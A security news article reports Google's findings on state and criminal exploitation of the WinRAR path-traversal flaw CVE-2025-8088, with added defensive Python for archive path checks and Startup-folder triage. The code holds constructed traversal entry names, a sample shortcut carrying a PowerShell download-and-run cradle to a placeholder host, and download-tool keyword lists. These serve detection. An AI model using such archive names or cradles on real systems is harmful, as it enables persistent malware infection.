Google Warns of Active Exploitation of WinRAR Vulnerability CVE-2025-8088
#Vulnerabilities

Security Reporter

Google Threat Intelligence Group reveals nation-state and financially motivated actors are actively exploiting a now-patched WinRAR vulnerability to establish persistence and deploy diverse malware payloads.

Google has issued a stark warning about the widespread exploitation of a high-severity WinRAR vulnerability, CVE-2025-8088, which continues to be weaponized by both nation-state adversaries and financially motivated cybercriminals months after its discovery and the release of a patch.

Critical Vulnerability Remains a Persistent Threat

The vulnerability, discovered by ESET and patched in WinRAR version 7.13 on July 30, 2025, carries a CVSS score of 8.8. It is a path traversal flaw: a crafted archive can make WinRAR write a file outside the directory the user chose for extraction, and placing that file in the Windows Startup folder turns the write into code execution at the victim's next logon. Despite the patch being available for months, Google Threat Intelligence Group (GTIG) reports that multiple threat actors continue exploiting this "n-day" vulnerability across diverse operations.

"Discovered and patched in July 2025, government-backed threat actors linked to Russia and China as well as financially motivated threat actors continue to exploit this n-day across disparate operations," GTIG stated in their analysis. "The consistent exploitation method, a path traversal flaw allowing files to be dropped into the Windows Startup folder for persistence, underscores a defensive gap in fundamental application security and user awareness."

Exploitation Methods and Attack Chains

Attackers use the flaw to establish persistence: the traversal lets an archive write files into the Windows Startup folder instead of the folder the user selected. The attack chains typically involve:

  • Hiding the malicious files (Windows shortcuts, i.e. LNK files, or scripts) as alternate data streams (ADS) attached to a harmless-looking decoy file inside the archive; the stream names carry the ..\ traversal sequence, so a casual look at the archive shows only the decoy
  • Extracting the decoy, which causes a vulnerable WinRAR to write the hidden payloads to the traversed path, typically the per-user Startup folder, with no further interaction
  • Automatic execution of the payload the next time the user logs on
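
The check that turns this class of bug into a rejected archive, written as an added example (not code from this article, from ESET or from RARLAB): before writing an entry, resolve its name against the extraction directory and refuse anything that lands outside it, treating the ADS name after the colon as a path as well, since that is where the traversal was hidden. The extraction root and the entry names are constructed for illustration; the third entry mimics the decoy-plus-stream shape described above.

```python
import ntpath

# Assumed extraction directory for the walkthrough; the check is pure path
# arithmetic on Windows-style names (ntpath), so it also runs on Linux/macOS.
EXTRACT_ROOT = r"C:\Users\alice\Downloads\cv"

# Constructed entry names, not taken from a real archive: a benign file, a
# benign stream, the decoy-plus-ADS shape described above, a plain traversal
# and an absolute path. Real exploits stack enough "..\" to reach the drive
# root whatever the extraction depth is.
SAMPLE_ENTRIES = [
    r"cv.pdf",
    r"cv.pdf:Zone.Identifier",
    r"cv.pdf:..\..\..\..\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk",
    r"..\..\Startup\payload.hta",
    r"C:\Windows\Temp\x.bat",
]


def is_contained(root: str, entry_name: str) -> bool:
    """True only if every path the entry could cause a write to stays under root.

    The name is split at the first colon into file name and alternate data
    stream name; both halves are resolved against root, because the vulnerable
    extractor treated the stream name as a path too.
    """
    # Rooted, UNC or drive-qualified names never belong in an archive. (A
    # one-letter file name with a stream, "a:b", is refused as well; that is
    # the safe side of the ambiguity.)
    if entry_name[:1] in ("\\", "/") or ntpath.splitdrive(entry_name)[0]:
        return False
    root_norm = ntpath.normcase(ntpath.normpath(root))
    base, _, stream = entry_name.partition(":")
    for part in (base, stream):
        if not part:
            continue
        # normpath collapses "..", "." and mixed separators before comparing.
        target = ntpath.normcase(ntpath.normpath(ntpath.join(root, part)))
        if target != root_norm and not target.startswith(root_norm + "\\"):
            return False
    return True


def check_entries(root: str, names) -> dict:
    """Map each entry name to True (safe to write) or False (must be refused)."""
    return {name: is_contained(root, name) for name in names}


if __name__ == "__main__":
    for name, ok in check_entries(EXTRACT_ROOT, SAMPLE_ENTRIES).items():
        print("OK     " if ok else "REJECT ", name)
```

Run stand-alone it prints a verdict per sample entry; the two benign names pass, the ADS traversal, the plain traversal and the absolute path are refused. The same containment test applies to any extractor you write or wrap (zip, 7z, tar), where the equivalent bugs recur.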

The initial discovery revealed that the dual financial and espionage-motivated threat group RomCom (also known as CIGAR or UNC4895) exploited the flaw as a zero-day as early as July 18, 2025, delivering a variant of the SnipBot malware, also referred to as NESTPACKER.

Nation-State Actors Weaponizing the Flaw

Google has identified several Russian threat actors actively exploiting CVE-2025-8088:

Sandworm (APT44/FROZENBARENTS): Leveraging the flaw to drop decoy files with Ukrainian filenames and malicious LNK files that attempt further downloads.

Gamaredon (CARPATHIAN): Using the vulnerability to target Ukrainian government agencies with malicious RAR archives containing HTML Application (HTA) files that act as downloaders for second-stage payloads.

Turla (SUMMIT): Delivering the STOCKSTAY malware suite using lures centered around Ukrainian military activities and drone operations.

Additionally, a China-based actor has been identified weaponizing the same vulnerability to deliver Poison Ivy malware via batch scripts dropped into the Windows Startup folder, configured to download additional droppers.

Financially Motivated Cybercrime Operations

Beyond nation-state actors, financially motivated threat actors have quickly adopted the vulnerability to deploy commodity remote access trojans (RATs) and information stealers against commercial targets. These campaigns have resulted in:

  • Deployment of Telegram bot-controlled backdoors
  • Distribution of malware families like AsyncRAT and XWorm
  • Campaigns by a cybercrime group against Brazilian online-banking users
  • Delivery of malicious Chrome extensions capable of injecting JavaScript into Brazilian banking sites to serve phishing content and steal credentials

Thriving Underground Economy for Exploits

The widespread exploitation of CVE-2025-8088 is partly attributed to a thriving underground economy where WinRAR exploits have been advertised for thousands of dollars. Google identified a supplier known as "zeroplayer" who marketed a WinRAR exploit in the weeks leading up to the public disclosure of the vulnerability.

"Zeroplayer's continued activity as an upstream supplier of exploits highlights the continued commoditization of the attack lifecycle," GTIG noted. "By providing ready-to-use capabilities, actors such as zeroplayer reduce the technical complexity and resource demands for threat actors, allowing groups with diverse motivations [...] to leverage a diverse set of capabilities."

Broader Context: Multiple WinRAR Vulnerabilities Under Attack

The exploitation of CVE-2025-8088 is particularly concerning given that another WinRAR vulnerability, CVE-2025-6218 (CVSS score: 7.8), a similar directory traversal fixed in WinRAR 7.12, has also been exploited by multiple threat actors including GOFFEE, Bitter, and Gamaredon. This pattern underscores the persistent threat posed by n-day vulnerabilities in widely used software.

Protection and Mitigation

Organizations and individuals are strongly advised to:

  1. Update WinRAR to version 7.13 or later immediately. WinRAR has no automatic update mechanism, so every install must be replaced by hand; the Windows command-line RAR and UnRAR tools and the UnRAR.dll bundled into third-party software were also affected, while the Unix and Android builds were not
  2. Implement application allowlisting (for example AppLocker or Windows Defender Application Control) so that scripts and binaries dropped into a user-writable folder cannot run
  3. Monitor for new or suspicious files in the Windows Startup folders: the per-user %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup, which these chains write to without needing administrative rights, and the all-users %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp
  4. Educate users about the risks of opening archive files from untrusted sources
  5. Deploy endpoint detection and response (EDR) solutions capable of identifying exploitation attempts, such as WinRAR writing files outside the chosen extraction directory or into a Startup folder
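
A triage script for the Startup-folder check in item 3, added here as an example and not taken from the article or from Google's report. It lists the files in the per-user and all-users Startup folders, flags script and shortcut types, and parses .lnk files (the MS-SHLLINK header and string fields only) to recover the target and arguments without launching anything. The sample shortcut is constructed inside the code, and its download cradle, the invalid-domain URL, the extension list and the keyword list are assumptions about what to look for, not observed indicators.

```python
import os
import struct
import tempfile
import time

# The two Startup folders on Windows; the chains above write to the per-user
# one, which needs no admin rights. Resolved from the environment, so on a
# non-Windows host both are simply absent and the scan returns nothing.
STARTUP_DIRS = [
    os.path.join(os.environ.get("APPDATA", ""), r"Microsoft\Windows\Start Menu\Programs\Startup"),
    os.path.join(os.environ.get("ProgramData", ""), r"Microsoft\Windows\Start Menu\Programs\StartUp"),
]
# Assumed watch lists: file types seen in the campaigns described, and strings
# that mark a shortcut as a downloader. Tune both to your environment.
SUSPICIOUS_EXT = {".lnk", ".hta", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".exe", ".dll"}
DOWNLOAD_HINTS = ("http://", "https://", "powershell", "mshta", "bitsadmin", "certutil", "curl")

# MS-SHLLINK constants: 76-byte header, link CLSID, LinkFlags bits.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"), (HAS_ICON, "icon"))


def parse_lnk(data: bytes) -> dict:
    """Read the StringData fields of a .lnk without resolving or launching it."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:        # LinkTargetIDList: uint16 size, then that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:      # LinkInfo: uint32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, key in STRING_FIELDS:  # each present field: uint16 char count, then the chars
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS.
    Used to construct sample data here; Explorer would write a richer file."""
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, HAS_REL_PATH | HAS_ARGS | IS_UNICODE)
    header += bytes(LNK_HEADER_SIZE - len(header))  # remaining header fields zeroed

    def enc(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + enc(relative_path) + enc(arguments)


# Constructed sample: a shortcut of the kind the chains above drop, climbing
# back to powershell.exe with a download cradle (example.invalid is reserved).
SAMPLE_LNK = build_lnk(
    r"..\..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-nop -w hidden -c "iwr https://example.invalid/s.ps1 | iex"',
)


def triage_startup_dir(path: str) -> list:
    """Return one finding per file in `path` that deserves a second look."""
    findings = []
    if not os.path.isdir(path):
        return findings
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        ext = os.path.splitext(name)[1].lower()
        reasons = []
        if ext in SUSPICIOUS_EXT:
            reasons.append(f"executable-type extension {ext}")
        if ext == ".lnk":
            try:
                with open(full, "rb") as fh:
                    fields = parse_lnk(fh.read())
            except ValueError as exc:
                reasons.append(f"unparseable shortcut: {exc}")
            else:
                blob = " ".join(fields.values()).lower()
                if any(hint in blob for hint in DOWNLOAD_HINTS):
                    reasons.append(f"shortcut invokes {fields.get('relative_path', '?')} "
                                   f"{fields.get('arguments', '')}")
        if reasons:
            age_days = (time.time() - os.path.getmtime(full)) / 86400
            findings.append({"file": full, "age_days": round(age_days, 1), "reasons": reasons})
    return findings


def demo() -> list:
    """Drop the constructed sample into a scratch folder and triage it."""
    with tempfile.TemporaryDirectory() as scratch:
        with open(os.path.join(scratch, "Updater.lnk"), "wb") as fh:
            fh.write(SAMPLE_LNK)
        with open(os.path.join(scratch, "desktop.ini"), "w") as fh:
            fh.write("[.ShellClassInfo]\n")  # present in every Startup folder; must not fire
        return triage_startup_dir(scratch)


if __name__ == "__main__":
    for folder in STARTUP_DIRS:
        for f in triage_startup_dir(folder):
            print(f["file"], f"({f['age_days']} days old):", "; ".join(f["reasons"]))
    for f in demo():
        print("demo:", "; ".join(f["reasons"]))
```

On a Windows host the first loop reports the real Startup folders; the demo shows what a dropped downloader shortcut looks like once its target and arguments are pulled out. Pair the listing with file creation times from your EDR or Sysmon (FileCreate in either Startup path by WinRAR.exe is the direct signal of this exploit) rather than relying on the extension list alone.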

The continued exploitation of a patched vulnerability months after its disclosure highlights the critical importance of timely software updates and the persistent threat landscape facing organizations worldwide. As threat actors commoditize exploits and share capabilities, a flaw that one group used as a zero-day becomes within weeks an n-day available to many, making proactive security measures more essential than ever.
